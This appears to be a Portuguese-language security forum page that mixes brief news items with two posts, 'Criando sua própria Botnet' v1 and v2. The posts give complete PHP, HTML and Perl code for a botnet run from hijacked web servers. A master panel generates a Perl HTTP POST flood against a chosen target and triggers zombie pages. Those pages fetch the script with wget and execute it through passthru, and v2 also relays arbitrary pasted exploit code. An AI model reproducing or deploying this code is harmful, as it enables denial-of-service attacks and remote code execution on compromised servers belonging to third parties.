Security Darkers - Expanding Knowledge!

Delegacias de SP voltam a registrar boletins de ocorrência

Além disso, através da notificação, o Procon solicitou as providências que estão sendo tomadas para solucionar o quanto antes este problema, quais as causas, quantas pessoas foram atingidas e de que forma estas serão ressarcidas. A Telefônica tem 24 horas para fornecer as respostas a todas as indagações, segundo Paulo Artur Góes, diretor de fiscalização do Procon.

Fonte: G1

 

Leia mais...

Descoberta a primeira vulnerabilidade no Firefox 3.0

O alerta acaba de ser lançado pelo grupo de investigadores TippingPoint: a recém-lançada versão 3.0 do browser Firefox tem uma vulnerabilidade.

A vulnerabilidade foi detectada no âmbito da iniciativa Dia Zero, informa um comunicado da Trend Micro.

Leia mais...

Criando sua própria Botnet v1 Para começar, você deve possuir algumas Shells, sistemas Ownados, é recomendado de três para cima. Consiga alguma PHP Shell (Recomendo c99 Shell).

No Master (PC que controla os outros), crie o seguinte arquivo:

index.htm:
<html>
<title>Master de Botnet - Configurações</title>
<body>
<b><font color=red size=4><center><u>Configurações:</u></center></font></b><br><br>
<form action=create.php method=POST>
<b>Servidor:</b><br><input type=text name=server><br><br>
<b>Diretório do arquivo (Exemplo: /home/hacker/arquivo): </b><br><input type=text name=path><br><br>
<b>POST string(Use live http): </b><br><input type=text name=post><br><br>
<b>Cookie(Opicional): </b><br><textarea name=cookie></textarea><br><br>
<input type=submit value="Enviar"><input type=reset value="Limpar">
</form>
<br><br>
<center>© <a href=http://www.darkers.com.br>Security Darkers</a>
</center>
</body>
</html>
create.php
<?php
$myFile = "file.txt";
unlink($myFile);
$file = "file.txt";
$fh = fopen($file, 'w') or die("can't open file");

$server = $_POST['server'];
$path = $_POST['path'];
$post = $_POST['post'];
$cookie = $_POST['cookie'];
$data = '#!/usr/bin/perl

use IO::Socket;

$time= "9999";
$HOST = "'. $server .'"; #Host Without http://
$DIR = "' . $path . '"; #Path to file

while($i<$time){
$i++;
$FILE = "' . $post . '";
$LENGTH = length $FILE;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";
print $get1 "Cookie: '. $cookie . ' ";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;
syswrite STDOUT, "+";
}';

fwrite($fh, $data);
print "Ok, thanks for the data, check your target when you get a load error. If it's still up, try again :).<br><br><b><font color=red>DO NOT CLOSE THIS WINDOW UNTIL THERE'S AN ERROR!!!</b></font>";
?>
<script language="JavaScript">
window.location="run.php";
</script>
file.txt
"Esse arquivo deve ficar em braco, e com direitos de execução, escrita e leitura para todos os usuários ( 'chmod +777 file.txt' ).
run.php
<?php
$fopen1 = fopen("http://hackedhost1.com/down.php", "r");
$fopen2 = fopen("http:/hackedhost2.com/down.php", "r");
$fopen3 = fopen("http://hackedhost3.com/down.php", "r");
$fopen4 = fopen("http://hackedhost4.com/down.php", "r");
fclose($fopen1);
fclose($fopen2);
fclose($fopen3);
fclose($fopen4);
?>Nesse arquivo, você edita de acordo com a quantidade de Shells, e seus esdereços.

Agora crie o arquivo seguinte nos servidores Ownados.

down.php
<?php
passthru("wget http://SEUSITE.com/botnet/file.txt");
passthru("mv file.txt secret.pl");
passthru("perl secret.pl");
?>
Depois de tudo pronto, abra o arquivo index.htm no seu host e ponha as configurações corretas. Cliquem em Enviar, e veja noque deu! Cloudy Leia mais...

Criando sua própria Botnet v2

Pessoal, todos aqui devem ter visto meu tópico falando sobre Botnets, que tinha um script feito em PHP.

Pois bem, dei uma incrementada legal no script, alterei bastante coisa, inclusive o Design, e agora dou uma explicação mais detalhada de como funciona.

Para quem não viu o primeiro post, leia-o aqui: http://www.darkers.com.br/forum/index.php/topic,3002.0.html

Bem, vou ensinar aqui como você pode fazer uma Botnet de um modo simples e fácil. Vou disponibilizar aqui um script bem simples, feito em PHP, melhorado por mim.

Pra começar, você precisa tem no seu servidor pessoal suporte a rodar PHP, e algumas Shells por aí, com suporte a wget, perl, php, e a função passthru("") do PHP deve estar abilitada.


No seu servidor pessoal deve ter os seguintes arquivos:

index.html:

<html><head><title>Botnet Master - Configurations:</title></head>
<FRAMESET rows="14%,76%,*" frameborder="no" border="0">
<frame src="/top.html">
<frame src="/center.html">
<frame src="/bottom.html">
</frameset>
</html>
top.html:
<html><body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="6">HadeS :</font> <font color="red" size="6">The Lord of Underground</font><br>
<u>Personal Botnet:</u></center>
</body></html>
bottom.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center>© <a href=http://www.darkers.com.br>Security Darkers</a>
</center>
</body>
</html>
left.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Padrão:</font></u></center><br><br>
<form action="create_padrao.php" method="POST">
<b>Servidor:</b><br><input type="text" name="server"><br><br>
<b>Caminho para o arquivo: </b><br><input type="text" name="path"><br><br>
<b>POST string (Use Live HTTP): </b><br><input type="text" name="post"><br><br>
<b>Cookie (Opcional): </b><br><textarea name="cookie" cols="23" rows="3"></textarea><br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>
right.html:
<html>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<center><b><font color="white" size="4"><u>Exploit Personalizado:</font></u></center><br><br>
<form action="create_perso.php" method="POST">
<b>Código Fonte do Exploit:</b><br>
<textarea name="xpl" rows="16" cols="65">Cole aqui o Código Fonte do Exploit desejado.

Lembre-se sempre de inserir um valor para as variáveis.</textarea>
<br><br>
<input type="submit" value="Enviar"> <input type="reset" value="Limpar">
</form>
</body>
</html>
create_padrao.php:
<?php
$myFile = "file.txt";
unlink($myFile);
$file = "file.txt";
$fh = fopen($file, 'w') or die("can't open file");

$server = $_POST['server'];
$path = $_POST['path'];
$post = $_POST['post'];
$cookie = $_POST['cookie'];
$data = '#!/usr/bin/perl

use IO::Socket;

$time= "9999";
$HOST = "'. $server .'"; #Host Without http://
$DIR = "' . $path . '"; #Path to file

while($i<$time){
$i++;
$FILE = "' . $post . '";
$LENGTH = length $FILE;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";
print $get1 "Cookie: '. $cookie . ' ";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;
syswrite STDOUT, "+";
}';

fwrite($fh, $data);
print "Ok, thanks for the data, check your target when you get a load error. If it's still up, try again :).<br><br><b><font color=red>DO NOT CLOSE THIS WINDOW UNTIL THERE'S AN ERROR!!!</b></font>";
?>
<script language="JavaScript">
window.location="run.php";
</script>
create_perso.php:
<?php
$myFile = "file.txt";
unlink($myFile);
$file = "file.txt";
$fh = fopen($file, 'w') or die("Error: Não foi possível abrir o arquivo file.txt .");

$data = $_POST['xpl'];;

fwrite($fh, $data);
?>
<script language="JavaScript">
window.location="run.php";
</script>
run.php:
<?php
$fopen1 = fopen("http://www.SITE.com/down.php", "r");
$fopen2 = fopen("http://www.SITE.com/down.php", "r");
$fopen3 = fopen("http://www.SITE.com/down.php", "r");
fclose($fopen1);
fclose($fopen2);
fclose($fopen3);
?>
<script language="JavaScript">
window.alert("Pronto, o exploit terminou de rodar. Provavelmente o server está OFF, chequê-o.");
window.location = "index.html";
</script>
file.txt:
"Esse arquivo deve estar em branco, e com CHMOD 777."

E nos sites invadidos (As Shells), devem ter o seguinte arquivo:

down.php:
<?php
passthru("wget http://www.SEU_SITE_PESSOAL.com.br/file.txt");
passthru("mv file.txt secret.pl");
passthru("perl secret.pl");
?>

Agora temos que observar alguns pontos.

Primeiro, caso você escolha a opção "Exploit Padrão", na index.html, você vai inserir algumas informações sobre a vítima, e a página create_padrao.php irá criar um exploit pré-definido. Caso você escolha a opção "Exploit Personalizado", você deverá inserir o código fonte do exploit no campo que existe na página, e esse exploit que será usado. Mas lembre-se, se você escolher a opção "Exploit Personalizado", não se esqueça de atribuir valores válidos às variaveis, pois caso contrário o exploit não irá rodar corretamente.

Segundo, em alguns arquivos você poderá fazer alterações para personalizá-lo de diversas formas, mas alguns você deverá alterá-los de acordo com sua situação. O primeiro é o run.php, você deve alterar a URL "http://www.SITE.com/down.php" pela URL do zumbi que possue o arquivo down.php instalado. O segundo é o down.php, você deve alterar a URL "http://www.SEU_SITE_PESSOAL.com.br/file.txt" para a URL do seu servidor pessoal (O Master da Botnet), que possue o arquivo file.txt.

Esse script, como qualquer outro, possue pontos positivos e negativos. Os positivos são que ele é muito simples e compacto, qualquer um pode usá-lo, você pode usar sua botnet de qualquer lugar (Só acessar a URL do master), e você não precisa rootar os zumbis para poder instalar algo, é só enviar a página down.php. E os negativos são que pelo Master você não tem acesso total ao sistema dos zumbis, você só pode mandar eles rodarem o exploit, e só tem suporte a exploits em Perl.

Em breve liberarei uma "versão" que permite rodar exploits feitos em PHP, Python, Shell Script, e compilados (C, C++, etc). E quem sabe poderei adicionar uma opção de rodar comandos em massa nos zumbis. Se alguém tiver vontade de fazer isso por sí só, sinta-se a vontade. Cloudy Leia mais...

Bug no XP SP3 Em um post no fórum de suporte da Symantec, Reese Anschultz, gerente sênior da empresa fornece as instruções de como desabilitar o SymProtect em várias versões do Norton.

A Symantec explica que o SymProtect é uma tecnologia criada para evitar que os softwares de segurança sejam hackeados por programas maliciosos.

Leia mais...